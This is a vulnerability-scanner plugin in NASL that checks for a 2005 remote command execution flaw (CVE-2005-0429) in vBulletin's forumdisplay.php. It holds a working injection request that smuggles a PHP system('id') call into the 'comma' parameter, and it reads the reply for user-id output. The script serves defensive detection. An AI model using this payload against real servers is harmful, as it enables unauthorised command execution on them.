#
# This script was written by David Maciejak <david dot maciejak at kyxar dot fr>
# Ref: AL3NDALEEB <al3ndaleeb at uk2 dot net>
# This script is released under the GNU GPL v2
#

 desc = "
The remote host is running vBulletin, a web based bulletin board system 
written in PHP.

The remote version of this software is vulnerable to remote command 
execution flaw throught the script 'forumdisplay.php'.

A malicious user could exploit this flaw to  execute arbitrary command on 
the remote host with the privileges of the web server.

Solution: Upgrade vBulletin 3.0.4 or newer
Risk factor : High";


if(description)
{
 script_id(16455);
 script_cve_id("CVE-2005-0429");
 script_bugtraq_id(12542);
 script_version("$Revision: 8292 $");
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"risk_factor", value:"Medium");
 name = "vBulletin Forumdisplay.PHP Remote Command Execution Vulnerability";
 script_name(name);

 script_description(desc);
 
 summary = "Checks for vBulletin Forumdisplay.PHP Remote Command Execution Vulnerability";
 
 script_summary(summary);
 
 script_category(ACT_ATTACK);
 
 script_copyright("This script is Copyright (C) 2005 David Maciejak");
 family = "Web application abuses";
 script_family(family);
 script_dependencie("http_version.nasl", "vbulletin_detect.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

# the code

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/vBulletin"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
  dir = matches[2];

  http_check_remote_code (
			unique_dir:dir,
			check_request: '/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system(\'id\')."',
			check_result:"uid=[0-9]+.*gid=[0-9]+.*",
			command:"id",
			description:desc
			);
}
